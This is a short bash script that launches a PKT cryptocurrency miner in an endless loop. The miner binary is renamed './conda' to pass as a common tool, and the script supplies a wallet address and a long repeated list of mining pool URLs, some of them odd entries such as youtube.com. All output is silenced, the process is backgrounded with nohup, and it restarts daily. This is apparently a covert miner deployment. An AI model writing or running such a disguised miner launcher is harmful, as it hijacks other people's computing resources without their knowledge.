#!/bin/bash
sleep 60
while true; do
nohup ./conda ann -t 1 -p pkt1qc78x283e46hyg79hk28cqvvyy6f2serafe65vm http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://pool.srizbi.com > /dev/null 2>&1 &
sleep 24h
pkill conda
sleep 6
done

